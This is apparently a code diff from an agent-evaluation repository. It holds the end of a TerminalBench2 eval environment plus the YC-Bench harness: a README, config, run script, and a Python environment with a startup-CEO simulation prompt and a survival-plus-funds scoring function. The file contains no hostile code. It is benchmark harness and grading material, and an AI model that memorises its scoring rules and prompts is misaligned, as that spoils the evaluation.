- steps_per_eval=1, total_steps=1 so eval triggers immediately
- group_size=1 (one rollout per group, each task is expensive)
Uses Modal terminal backend (cloud-isolated sandbox per task) and
OpenRouter with Claude for inference.
"""
env_config = TerminalBench2EvalConfig(
# Terminal + file tools only (the agent interacts via shell commands)
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
# Agent settings -- TB2 tasks are complex, need many turns
max_agent_turns=60,
max_token_length=***
agent_temperature=0.6,
system_prompt=None,
# Modal backend for per-task cloud-isolated sandboxes
terminal_backend="modal",
terminal_timeout=300, # 5 min per command (builds, pip install, etc.)
# Test execution timeout (TB2 test scripts can install deps like pytest)
test_timeout=180,
# 89 tasks run in parallel, each needs a thread for tool calls
tool_pool_size=128,
# --- Eval-only Atropos settings ---
# These settings make the env work as an eval-only environment:
# - STOP_TRAIN: pauses training during eval (standard for eval envs)
# - steps_per_eval=1, total_steps=1: eval triggers immediately
# - group_size=1: one rollout per group (each task is expensive)
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousRe...1-8B",
use_wandb=True,
wandb_name="terminal-bench-2",
ensure_scores_are_not_same=False, # Binary rewards may all be 0 or 1
)
# OpenRouter with Claude -- API key loaded from .env
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
# =========================================================================
# Setup -- load dataset
# =========================================================================
async def setup(self):
"""Load the Terminal-Bench 2.0 dataset from HuggingFace."""
from datasets import load_dataset
# Auto-set terminal_lifetime to task_timeout + 120s so sandboxes
# never get killed during an active task, but still get cleaned up
# promptly after the task times out.
lifetime = self.config.task_timeout + 120
self.config.terminal_lifetime = lifetime
os.environ["TERMINAL_LIFETIME_SECONDS"] = str(lifetime)
print(f" Terminal lifetime auto-set to {lifetime}s (task_timeout + 120s)")
print(f"Loading TB2 dataset from: {self.config.dataset_name}")
ds = load_dataset(self.config.dataset_name, split="train")
# Apply task filters (comma-separated strings from CLI)
tasks = list(ds)
if self.config.task_filter:
allowed = {name.strip() for name in self.config.task_filter.split(",")}
tasks = [t for t in tasks if t["task_name"] in allowed]
print(f" Filtered to {len(tasks)} tasks: {sorted(allowed)}")
# Skip tasks incompatible with the current backend (e.g., QEMU on Modal)
# plus any user-specified skip_tasks
skip = set(MODAL_INCOMPATIBLE_TASKS) if self.config.terminal_backend == "modal" else set()
if self.config.skip_tasks:
skip |= {name.strip() for name in self.config.skip_tasks.split(",")}
if skip:
before = len(tasks)
tasks = [t for t in tasks if t["task_name"] not in skip]
skipped = before - len(tasks)
if skipped > 0:
print(f" Skipped {skipped} incompatible tasks: {sorted(skip & {t['task_name'] for t in ds})}")
self.all_eval_items = tasks
self.iter = 0
# Build category index for per-category metrics
self.category_index: Dict[str, List[int]] = defaultdict(list)
for i, task in enumerate(self.all_eval_items):
self.category_index[task.get("category", "unknown")].append(i)
# Reward tracking for wandb logging
self.eval_metrics: List[Tuple[str, float]] = []
# Streaming JSONL writer -- saves each task's full conversation
# immediately on completion so data is preserved even on Ctrl+C.
# Timestamped filename so each run produces a unique file.
import datetime
log_dir = os.path.join(os.path.dirname(__file__), "logs")
os.makedirs(log_dir, exist_ok=True)
run_ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self._streaming_path = os.path.join(log_dir, f"samples_{run_ts}.jsonl")
self._streaming_file = open(self._streaming_path, "w")
import threading
self._streaming_lock = threading.Lock()
print(f" Streaming results to: {self._streaming_path}")
print(f"TB2 ready: {len(self.all_eval_items)} tasks across {len(self.category_index)} categories")
for cat, indices in sorted(self.category_index.items()):
print(f" {cat}: {len(indices)} tasks")
def _save_result(self, result: Dict[str, Any]):
"""Write a single task result to the streaming JSONL file immediately."""
if not hasattr(self, "_streaming_file") or self._streaming_file.closed:
return
with self._streaming_lock:
self._streaming_file.write(json.dumps(result, ensure_ascii=False, default=str) + "\n")
self._streaming_file.flush()
# =========================================================================
# Training pipeline stubs -- NOT used in eval-only mode
# =========================================================================
# These satisfy the abstract method requirements from HermesAgentBaseEnv.
# The evaluate subcommand calls setup() -> evaluate() directly, bypassing
# the training pipeline entirely.
async def get_next_item(self):
"""Return next item (stub -- not used in eval-only mode)."""
item = self.all_eval_items[self.iter % len(self.all_eval_items)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
"""Return the task's instruction as the user prompt."""
return item["instruction"]
async def compute_reward(self, item, result, ctx) -> float:
"""Compute reward (stub -- actual verification is in rollout_and_score_eval)."""
return 0.0
async def collect_trajectories(self, item):
"""Collect trajectories (stub -- not used in eval-only mode)."""
return None, []
async def score(self, rollout_group_data):
"""Score rollouts (stub -- not used in eval-only mode)."""
return None
# =========================================================================
# Docker image resolution
# =========================================================================
def _resolve_task_image(
self, item: Dict[str, Any], task_name: str
) -> Tuple[str, Optional[Path]]:
"""
Resolve the Docker image for a task, with fallback to Dockerfile.
Strategy (mirrors Harbor's approach):
1. If force_build=True, always build from Dockerfile in environment_tar
2. If docker_image is available, use the pre-built Docker Hub image (fast)
3. Otherwise, extract Dockerfile from environment_tar and build (slow)
Returns:
(modal_image, temp_dir) -- modal_image is a Docker Hub name or a
Dockerfile path. temp_dir is set if we extracted files that need
cleanup later.
"""
docker_image = item.get("docker_image", "")
environment_tar = item.get("environment_tar", "")
# Fast path: use pre-built Docker Hub image
if docker_image and not self.config.force_build:
logger.info("Task %s: using pre-built image %s", task_name, docker_image)
return docker_image, None
# Slow path: extract Dockerfile from environment_tar and build
if environment_tar:
task_dir = Path(tempfile.mkdtemp(prefix=f"tb2-{task_name}-"))
_extract_base64_tar(environment_tar, task_dir)
dockerfile_path = task_dir / "Dockerfile"
if dockerfile_path.exists():
logger.info(
"Task %s: building from Dockerfile (force_build=%s, docker_image=%s)",
task_name, self.config.force_build, bool(docker_image),
)
return str(dockerfile_path), task_dir
# Neither available -- fall back to Hub image if force_build was True
if docker_image:
logger.warning(
"Task %s: force_build=True but no environment_tar, "
"falling back to docker_image %s", task_name, docker_image,
)
return docker_image, None
return "", None
# =========================================================================
# Per-task evaluation -- agent loop + test verification
# =========================================================================
async def rollout_and_score_eval(self, eval_item: Dict[str, Any]) -> Dict:
"""
Evaluate a single TB2 task: run the agent loop, then verify with tests.
This is the core evaluation method. For each task it:
1. Resolves the Docker image and registers the Modal sandbox override
2. Runs HermesAgentLoop with terminal + file tools
3. Uploads the test suite into the sandbox
4. Executes test.sh and checks the result
5. Cleans up the sandbox and temp files
Args:
eval_item: A single TB2 task dict from the dataset
Returns:
Dict with 'passed' (bool), 'reward' (float), 'task_name' (str),
'category' (str), and optional debug info
"""
task_name = eval_item.get("task_name", "unknown")
category = eval_item.get("category", "unknown")
task_id = str(uuid.uuid4())
task_dir = None # Set if we extract a Dockerfile (needs cleanup)
from tqdm import tqdm
tqdm.write(f" [START] {task_name} (task_id={task_id[:8]})")
task_start = time.time()
try:
# --- 1. Resolve Docker image ---
modal_image, task_dir = self._resolve_task_image(eval_item, task_name)
if not modal_image:
logger.error("Task %s: no docker_image or environment_tar, skipping", task_name)
return {
"passed": False, "reward": 0.0,
"task_name": task_name, "category": category,
"error": "no_image",
}
# --- 2. Register per-task image override ---
# Set both modal_image and docker_image so the task image is used
# regardless of which backend is configured.
register_task_env_overrides(task_id, {
"modal_image": modal_image,
"docker_image": modal_image,
"cwd": "/app",
})
logger.info(
"Task %s: registered image override for task_id %s",
task_name, task_id[:8],
)
# --- 3. Resolve tools and build messages ---
tools, valid_names = self._resolve_tools_for_group()
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(eval_item)})
# --- 4. Run agent loop ---
# Use ManagedServer (Phase 2) for vLLM/SGLang backends to get
# token-level tracking via /generate. Falls back to direct
# ServerManager (Phase 1) for OpenAI endpoints.
if self._use_managed_server():
async with self.server.managed_server(
tokenizer=self.tokenizer,
preserve_think_blocks=bool(self.config.thinking_mode),
) as managed:
agent = HermesAgentLoop(
server=managed,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
else:
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# --- 5. Verify -- run test suite in the agent's sandbox ---
# Skip verification if the agent produced no meaningful output
only_system_and_user = all(
msg.get("role") in ("system", "user") for msg in result.messages
)
if result.turns_used == 0 or only_system_and_user:
logger.warning(
"Task %s: agent produced no output (turns=%d). Reward=0.",
task_name, result.turns_used,
)
reward = 0.0
else:
# Run tests in a thread so the blocking ctx.terminal() calls


@@ -0,0 +1,115 @@
# YC-Bench: Long-Horizon Agent Benchmark
[YC-Bench](https://github.com/collinear-ai/yc-bench) by [Collinear AI](https://collinear.ai/) is a deterministic, long-horizon benchmark that tests LLM agents' ability to act as a tech startup CEO. The agent manages a simulated company over 1-3 years, making compounding decisions about resource allocation, cash flow, task management, and prestige specialisation across 4 skill domains.
Unlike TerminalBench2 (which evaluates per-task coding ability with binary pass/fail), YC-Bench measures **long-term strategic coherence** — whether an agent can maintain consistent strategy, manage compounding consequences, and adapt plans over hundreds of turns.
## Setup
```bash
# Install yc-bench (optional dependency)
pip install "hermes-agent[yc-bench]"
# Or install from source
git clone https://github.com/collinear-ai/yc-bench
cd yc-bench && pip install -e .
# Verify
yc-bench --help
```
## Running
```bash
# From the repo root:
bash environments/benchmarks/yc_bench/run_eval.sh
# Or directly:
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml
# Override model:
bash environments/benchmarks/yc_bench/run_eval.sh \
--openai.model_name anthropic/claude-opus-4-20250514
# Quick single-preset test:
bash environments/benchmarks/yc_bench/run_eval.sh \
--env.presets '["fast_test"]' --env.seeds '[1]'
```
## How It Works
### Architecture
```
HermesAgentLoop (our agent)
-> terminal tool -> subprocess("yc-bench company status") -> JSON output
-> terminal tool -> subprocess("yc-bench task accept --task-id X") -> JSON
-> terminal tool -> subprocess("yc-bench sim resume") -> JSON (advance time)
-> ... (100-500 turns per run)
```
The environment initialises the simulation via `yc-bench sim init` (NOT `yc-bench run`, which would start yc-bench's own built-in agent loop). Our `HermesAgentLoop` then drives all interaction through CLI commands.
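For intuition, here is a minimal sketch of one observe/act cycle as plain subprocess calls, assuming the JSON output shown in the diagram above. The `yc` helper is hypothetical; in the actual environment these calls go through `HermesAgentLoop` and the terminal tool rather than direct Python:
```python
import json
import subprocess

def yc(*args: str) -> dict:
    """Run one yc-bench subcommand and parse its JSON output (hypothetical helper)."""
    proc = subprocess.run(["yc-bench", *args],
                          capture_output=True, text=True, timeout=60)
    if proc.returncode != 0:
        raise RuntimeError(proc.stderr.strip())
    return json.loads(proc.stdout)

status = yc("company", "status")                  # funds, prestige, runway
active = yc("task", "list", "--status", "active")
yc("sim", "resume")                               # advance the simulation clock
```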
### Simulation Mechanics
- **4 skill domains**: research, inference, data_environment, training
- **Prestige system** (1.0-10.0): Gates access to higher-paying tasks
- **Employee management**: Junior/Mid/Senior with domain-specific skill rates
- **Throughput splitting**: `effective_rate = base_rate / N`, where N is the number of tasks an employee works on concurrently (see the worked example after this list)
- **Financial pressure**: Monthly payroll, bankruptcy = game over
- **Deterministic**: SHA256-based RNG — same seed + preset = same world
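A quick worked example of the throughput split (numbers are illustrative):
```python
# One employee's base skill rate in a domain, split across active tasks.
base_rate = 4.0  # units/hour
for n_active in (1, 2, 4):
    effective_rate = base_rate / n_active
    print(f"{n_active} active task(s) -> {effective_rate:.1f} units/hour each")
# 1 -> 4.0, 2 -> 2.0, 4 -> 1.0: concentrated assignments finish tasks sooner.
```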
### Difficulty Presets
| Preset | Employees | Tasks | Focus |
|-----------|-----------|-------|-------|
| tutorial | 3 | 50 | Basic loop mechanics |
| easy | 5 | 100 | Throughput awareness |
| **medium** | 5 | 150 | Prestige climbing + domain specialisation |
| **hard** | 7 | 200 | Precise ETA reasoning |
| nightmare | 8 | 300 | Sustained perfection under payroll pressure |
| fast_test | (varies) | (varies) | Quick validation (~50 turns) |
Default eval runs **fast_test + medium + hard** × 3 seeds = 9 runs.
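This mirrors how the environment's `setup()` builds its eval matrix as a preset × seed cross product:
```python
presets = ["fast_test", "medium", "hard"]
seeds = [1, 2, 3]
runs = [{"preset": p, "seed": s} for p in presets for s in seeds]
assert len(runs) == len(presets) * len(seeds) == 9
```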
### Scoring
```
composite = 0.5 × survival + 0.5 × normalised_funds
```
- **Survival** (binary): Did the company avoid bankruptcy?
- **Normalised funds** (0.0-1.0): Log-scale relative to initial $250K capital
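A minimal sketch of the composite, mirroring the environment's `_compute_composite_score` helper (log1p-normalised against the starting capital, capped at a 100× return):
```python
import math

INITIAL_FUNDS_CENTS = 25_000_000  # $250K starting capital, in cents

def composite_score(final_funds_cents: int, survived: bool,
                    survival_weight: float = 0.5,
                    funds_weight: float = 0.5) -> float:
    survival_score = 1.0 if survived else 0.0
    if final_funds_cents <= 0:
        funds_score = 0.0
    else:
        ratio = final_funds_cents / INITIAL_FUNDS_CENTS
        # Log scale: 1x initial -> ~0.15, 10x -> ~0.52, 100x -> capped at 1.0
        funds_score = min(math.log1p(ratio) / math.log1p(100.0), 1.0)
    return survival_weight * survival_score + funds_weight * funds_score

# Surviving with funds exactly at the initial $250K scores about 0.58:
print(composite_score(INITIAL_FUNDS_CENTS, survived=True))  # ~0.575
```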
## Configuration
Key fields in `default.yaml`:
| Field | Default | Description |
|-------|---------|-------------|
| `presets` | `["fast_test", "medium", "hard"]` | Which presets to evaluate |
| `seeds` | `[1, 2, 3]` | RNG seeds per preset |
| `max_agent_turns` | 200 | Max LLM calls per run |
| `run_timeout` | 3600 | Wall-clock timeout per run (seconds) |
| `survival_weight` | 0.5 | Weight of survival in composite score |
| `funds_weight` | 0.5 | Weight of normalised funds in composite |
| `horizon_years` | null | Override horizon (null = auto from preset) |
## Cost & Time Estimates
Each run is 100-500 LLM turns. Approximate costs per run at typical API rates:
| Preset | Turns | Time | Est. Cost |
|--------|-------|------|-----------|
| fast_test | ~50 | 5-10 min | $1-5 |
| medium | ~200 | 20-40 min | $5-15 |
| hard | ~300 | 30-60 min | $10-25 |
Full default eval (9 runs): ~3-6 hours, $50-200 depending on model.
## References
- [collinear-ai/yc-bench](https://github.com/collinear-ai/yc-bench) — Official repository
- [Collinear AI](https://collinear.ai/) — Company behind yc-bench
- [TerminalBench2](../terminalbench_2/) — Per-task coding benchmark (complementary)


@@ -0,0 +1,43 @@
# YC-Bench Evaluation -- Default Configuration
#
# Long-horizon agent benchmark: agent plays CEO of an AI startup over
# a simulated 1-3 year run, interacting via yc-bench CLI subcommands.
#
# Requires: pip install "hermes-agent[yc-bench]"
#
# Usage:
# python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
# --config environments/benchmarks/yc_bench/default.yaml
#
# # Override model:
# python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
# --config environments/benchmarks/yc_bench/default.yaml \
# --openai.model_name anthropic/claude-opus-4-20250514
env:
enabled_toolsets: ["terminal"]
max_agent_turns: 200
max_token_length: 32000
agent_temperature: 0.0
terminal_backend: "local"
terminal_timeout: 60
presets: ["fast_test", "medium", "hard"]
seeds: [1, 2, 3]
run_timeout: 3600 # 60 min wall-clock per run, auto-FAIL if exceeded
survival_weight: 0.5 # weight of binary survival in composite score
funds_weight: 0.5 # weight of normalised final funds in composite score
db_dir: "/tmp/yc_bench_dbs"
company_name: "BenchCo"
start_date: "01/01/2025" # MM/DD/YYYY (yc-bench convention)
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: true
wandb_name: "yc-bench"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/yc-bench"
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-sonnet-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env


@@ -0,0 +1,34 @@
#!/bin/bash
# YC-Bench Evaluation
#
# Requires: pip install "hermes-agent[yc-bench]"
#
# Run from repo root:
# bash environments/benchmarks/yc_bench/run_eval.sh
#
# Override model:
# bash environments/benchmarks/yc_bench/run_eval.sh \
# --openai.model_name anthropic/claude-opus-4-20250514
#
# Run a single preset:
# bash environments/benchmarks/yc_bench/run_eval.sh \
# --env.presets '["fast_test"]' --env.seeds '[1]'
set -euo pipefail
mkdir -p logs evals/yc-bench
LOG_FILE="logs/yc_bench_$(date +%Y%m%d_%H%M%S).log"
echo "YC-Bench Evaluation"
echo "Log: $LOG_FILE"
echo ""
PYTHONUNBUFFERED=1 LOGLEVEL="${LOGLEVEL:-INFO}" \
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml \
"$@" \
2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"


@@ -0,0 +1,847 @@
"""
YCBenchEvalEnv -- YC-Bench Long-Horizon Agent Benchmark Environment
Evaluates agentic LLMs on YC-Bench: a deterministic, long-horizon benchmark
where the agent acts as CEO of an AI startup over a simulated 1-3 year run.
The agent manages cash flow, employees, tasks, and prestige across 4 domains,
interacting exclusively via CLI subprocess calls against a SQLite-backed
discrete-event simulation.
Unlike TerminalBench2 (per-task binary pass/fail), YC-Bench measures sustained
multi-turn strategic coherence -- whether an agent can manage compounding
decisions over hundreds of turns without going bankrupt.
This is an eval-only environment. Run via:
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml
The evaluate flow:
1. setup() -- Verifies yc-bench installed, builds eval matrix (preset x seed)
2. evaluate() -- Iterates over all runs sequentially through:
a. rollout_and_score_eval() -- Per-run agent loop
- Initialises a fresh yc-bench simulation via `sim init` (NOT `run`)
- Runs HermesAgentLoop with terminal tool only
- Reads final SQLite DB to extract score
- Returns survival (0/1) + normalised funds score
b. Aggregates per-preset and overall metrics
c. Logs results via evaluate_log() and wandb
Key features:
- CLI-only interface: agent calls yc-bench subcommands via terminal tool
- Deterministic: same seed + preset = same world (SHA256-based RNG)
- Multi-dimensional scoring: survival + normalised final funds
- Per-preset difficulty breakdown in results
- Isolated SQLite DB per run (no cross-run state leakage)
Requires: pip install hermes-agent[yc-bench]
"""
import asyncio
import datetime
import json
import logging
import math
import os
import sqlite3
import subprocess
import sys
import threading
import time
import uuid
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.agent_loop import HermesAgentLoop
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
logger = logging.getLogger(__name__)
# =============================================================================
# System prompt
# =============================================================================
YC_BENCH_SYSTEM_PROMPT = """\
You are the autonomous CEO of an early-stage AI startup in a deterministic
business simulation. You manage the company exclusively through the `yc-bench`
CLI tool. Your primary goal is to **survive** until the simulation horizon ends
without going bankrupt, while **maximising final funds**.
## Simulation Mechanics
- **Funds**: You start with $250,000 seed capital. Revenue comes from completing
tasks. Rewards scale with your prestige: `base × (1 + scale × (prestige − 1))`.
- **Domains**: There are 4 skill domains: **research**, **inference**,
**data_environment**, and **training**. Each has its own prestige level
(1.0-10.0). Higher prestige unlocks better-paying tasks.
- **Employees**: You have employees (Junior/Mid/Senior) with domain-specific
skill rates. **Throughput splits**: `effective_rate = base_rate / N` where N
is the number of active tasks assigned to that employee. Focus beats breadth.
- **Payroll**: Deducted automatically on the first business day of each month.
Running out of funds = bankruptcy = game over.
- **Time**: The simulation runs on business days (Mon-Fri), 09:00-18:00.
Time only advances when you call `yc-bench sim resume`.
## Task Lifecycle
1. Browse market tasks with `market browse`
2. Accept a task with `task accept` (this sets its deadline)
3. Assign employees with `task assign`
4. Dispatch with `task dispatch` to start work
5. Call `sim resume` to advance time and let employees make progress
6. Tasks complete when all domain requirements are fulfilled
**Penalties for failure vary by difficulty preset.** Completing a task on time
earns full reward + prestige gain. Missing a deadline or cancelling a task
incurs prestige penalties -- cancelling is always more costly than letting a
task fail, so cancel only as a last resort.
## CLI Commands
### Observe
- `yc-bench company status` -- funds, prestige, runway
- `yc-bench employee list` -- skills, salary, active tasks
- `yc-bench market browse [--domain D] [--required-prestige-lte N]` -- available tasks
- `yc-bench task list [--status active|planned]` -- your tasks
- `yc-bench task inspect --task-id UUID` -- progress, deadline, assignments
- `yc-bench finance ledger [--category monthly_payroll|task_reward]` -- transaction history
- `yc-bench report monthly` -- monthly P&L
### Act
- `yc-bench task accept --task-id UUID` -- accept from market
- `yc-bench task assign --task-id UUID --employee-id UUID` -- assign employee
- `yc-bench task dispatch --task-id UUID` -- start work (needs >=1 assignment)
- `yc-bench task cancel --task-id UUID --reason "text"` -- cancel (prestige penalty)
- `yc-bench sim resume` -- advance simulation clock
### Memory (persists across context truncation)
- `yc-bench scratchpad read` -- read your persistent notes
- `yc-bench scratchpad write --content "text"` -- overwrite notes
- `yc-bench scratchpad append --content "text"` -- append to notes
- `yc-bench scratchpad clear` -- clear notes
## Strategy Guidelines
1. **Specialise in 2-3 domains** to climb the prestige ladder faster and unlock
high-reward tasks. Don't spread thin across all 4 domains early on.
2. **Focus employees** -- assigning one employee to many tasks halves their
throughput per additional task. Keep assignments concentrated.
3. **Use the scratchpad** to track your strategy, upcoming deadlines, and
employee assignments. This persists even if conversation context is truncated.
4. **Monitor runway** -- always know how many months of payroll you can cover.
Accept high-reward tasks before payroll dates.
5. **Don't over-accept** -- taking too many tasks and missing deadlines cascades
into prestige loss, locking you out of profitable contracts.
6. Use `finance ledger` and `report monthly` to track revenue trends.
## Your Turn
Each turn:
1. Call `yc-bench company status` and `yc-bench task list` to orient yourself.
2. Check for completed tasks and pending deadlines.
3. Browse market for profitable tasks within your prestige level.
4. Accept, assign, and dispatch tasks strategically.
5. Call `yc-bench sim resume` to advance time.
6. Repeat until the simulation ends.
Think step by step before acting."""
# Starting funds in cents ($250,000)
INITIAL_FUNDS_CENTS = 25_000_000
# Default horizon per preset (years)
_PRESET_HORIZONS = {
"tutorial": 1,
"easy": 1,
"medium": 1,
"hard": 1,
"nightmare": 1,
"fast_test": 1,
"default": 3,
"high_reward": 1,
}
# =============================================================================
# Configuration
# =============================================================================
class YCBenchEvalConfig(HermesAgentEnvConfig):
"""
Configuration for the YC-Bench evaluation environment.
Extends HermesAgentEnvConfig with YC-Bench-specific settings for
preset selection, seed control, scoring, and simulation parameters.
"""
presets: List[str] = Field(
default=["fast_test", "medium", "hard"],
description="YC-Bench preset names to evaluate.",
)
seeds: List[int] = Field(
default=[1, 2, 3],
description="Random seeds -- each preset x seed = one run.",
)
run_timeout: int = Field(
default=3600,
description="Maximum wall-clock seconds per run. Default 60 minutes.",
)
survival_weight: float = Field(
default=0.5,
description="Weight of survival (0/1) in composite score.",
)
funds_weight: float = Field(
default=0.5,
description="Weight of normalised final funds in composite score.",
)
db_dir: str = Field(
default="/tmp/yc_bench_dbs",
description="Directory for per-run SQLite databases.",
)
horizon_years: Optional[int] = Field(
default=None,
description=(
"Simulation horizon in years. If None (default), inferred from "
"preset name (1 year for most, 3 for 'default')."
),
)
company_name: str = Field(
default="BenchCo",
description="Name of the simulated company.",
)
start_date: str = Field(
default="01/01/2025",
description="Simulation start date in MM/DD/YYYY format (yc-bench convention).",
)
# =============================================================================
# Scoring helpers
# =============================================================================
def _read_final_score(db_path: str) -> Dict[str, Any]:
"""
Read final game state from a YC-Bench SQLite database.
Returns dict with final_funds_cents (int), survived (bool),
terminal_reason (str).
Note: yc-bench table names are plural -- 'companies' not 'company',
'sim_events' not 'simulation_log'.
"""
if not os.path.exists(db_path):
logger.warning("DB not found at %s", db_path)
return {
"final_funds_cents": 0,
"survived": False,
"terminal_reason": "db_missing",
}
conn = None
try:
conn = sqlite3.connect(db_path)
cur = conn.cursor()
# Read final funds from the 'companies' table
cur.execute("SELECT funds_cents FROM companies LIMIT 1")
row = cur.fetchone()
funds = row[0] if row else 0
# Determine terminal reason from 'sim_events' table
terminal_reason = "unknown"
try:
cur.execute(
"SELECT event_type FROM sim_events "
"WHERE event_type IN ('bankruptcy', 'horizon_end') "
"ORDER BY scheduled_at DESC LIMIT 1"
)
event_row = cur.fetchone()
if event_row:
terminal_reason = event_row[0]
except sqlite3.OperationalError:
# Table may not exist if simulation didn't progress
pass
survived = funds >= 0 and terminal_reason != "bankruptcy"
return {
"final_funds_cents": funds,
"survived": survived,
"terminal_reason": terminal_reason,
}
except Exception as e:
logger.error("Failed to read DB %s: %s", db_path, e)
return {
"final_funds_cents": 0,
"survived": False,
"terminal_reason": f"db_error: {e}",
}
finally:
if conn:
conn.close()
def _compute_composite_score(
final_funds_cents: int,
survived: bool,
survival_weight: float = 0.5,
funds_weight: float = 0.5,
initial_funds_cents: int = INITIAL_FUNDS_CENTS,
) -> float:
"""
Compute composite score from survival and final funds.
Score = survival_weight * survival_score
+ funds_weight * normalised_funds_score
Normalised funds uses log-scale relative to initial capital:
- funds <= 0: 0.0
- funds == initial: ~0.15
- funds == 10x: ~0.52
- funds == 100x: 1.0
"""
survival_score = 1.0 if survived else 0.0
if final_funds_cents <= 0:
funds_score = 0.0
else:
max_ratio = 100.0
ratio = final_funds_cents / max(initial_funds_cents, 1)
funds_score = min(math.log1p(ratio) / math.log1p(max_ratio), 1.0)
return survival_weight * survival_score + funds_weight * funds_score
# =============================================================================
# Main Environment
# =============================================================================
class YCBenchEvalEnv(HermesAgentBaseEnv):
"""
YC-Bench long-horizon agent benchmark environment (eval-only).
Each eval item is a (preset, seed) pair. The environment initialises the
simulation via ``yc-bench sim init`` (NOT ``yc-bench run`` which would start
a competing built-in agent loop). The HermesAgentLoop then drives the
interaction by calling individual yc-bench CLI commands via the terminal tool.
After the agent loop ends, the SQLite DB is read to extract the final score.
Scoring:
composite = 0.5 * survival + 0.5 * normalised_funds
"""
name = "yc-bench"
env_config_cls = YCBenchEvalConfig
@classmethod
def config_init(cls) -> Tuple[YCBenchEvalConfig, List[APIServerConfig]]:
env_config = YCBenchEvalConfig(
enabled_toolsets=["terminal"],
disabled_toolsets=None,
distribution=None,
max_agent_turns=200,
max_token_length=32000,
agent_temperature=0.0,
system_prompt=YC_BENCH_SYSTEM_PROMPT,
terminal_backend="local",
terminal_timeout=60,
presets=["fast_test", "medium", "hard"],
seeds=[1, 2, 3],
run_timeout=3600,
survival_weight=0.5,
funds_weight=0.5,
db_dir="/tmp/yc_bench_dbs",
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
use_wandb=True,
wandb_name="yc-bench",
ensure_scores_are_not_same=False,
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4.6",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
# =========================================================================
# Setup
# =========================================================================
async def setup(self):
"""Verify yc-bench is installed and build the eval matrix."""
# Verify yc-bench CLI is available
try:
result = subprocess.run(
["yc-bench", "--help"], capture_output=True, text=True, timeout=10
)
if result.returncode != 0:
raise FileNotFoundError
except (FileNotFoundError, subprocess.TimeoutExpired):
raise RuntimeError(
"yc-bench CLI not found. Install with:\n"
' pip install "hermes-agent[yc-bench]"\n'
"Or: git clone https://github.com/collinear-ai/yc-bench "
"&& cd yc-bench && pip install -e ."
)
print("yc-bench CLI verified.")
# Build eval matrix: preset x seed
self.all_eval_items = [
{"preset": preset, "seed": seed}
for preset in self.config.presets
for seed in self.config.seeds
]
self.iter = 0
os.makedirs(self.config.db_dir, exist_ok=True)
self.eval_metrics: List[Tuple[str, float]] = []
# Streaming JSONL log for crash-safe result persistence
log_dir = os.path.join(os.path.dirname(__file__), "logs")
os.makedirs(log_dir, exist_ok=True)
run_ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self._streaming_path = os.path.join(log_dir, f"samples_{run_ts}.jsonl")
self._streaming_file = open(self._streaming_path, "w")
self._streaming_lock = threading.Lock()
print(f"\nYC-Bench eval matrix: {len(self.all_eval_items)} runs")
for item in self.all_eval_items:
print(f" preset={item['preset']!r} seed={item['seed']}")
print(f"Streaming results to: {self._streaming_path}\n")
def _save_result(self, result: Dict[str, Any]):
"""Write a single run result to the streaming JSONL file immediately."""
if not hasattr(self, "_streaming_file") or self._streaming_file.closed:
return
with self._streaming_lock:
self._streaming_file.write(
json.dumps(result, ensure_ascii=False, default=str) + "\n"
)
self._streaming_file.flush()
# =========================================================================
# Training pipeline stubs (eval-only -- not used)
# =========================================================================
async def get_next_item(self):
item = self.all_eval_items[self.iter % len(self.all_eval_items)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
preset = item["preset"]
seed = item["seed"]
return (
f"A new YC-Bench simulation has been initialized "
f"(preset='{preset}', seed={seed}).\n"
f"Your company '{self.config.company_name}' is ready.\n\n"
"Begin by calling:\n"
"1. `yc-bench company status` -- see your starting funds and prestige\n"
"2. `yc-bench employee list` -- see your team and their skills\n"
"3. `yc-bench market browse --required-prestige-lte 1` -- find tasks "
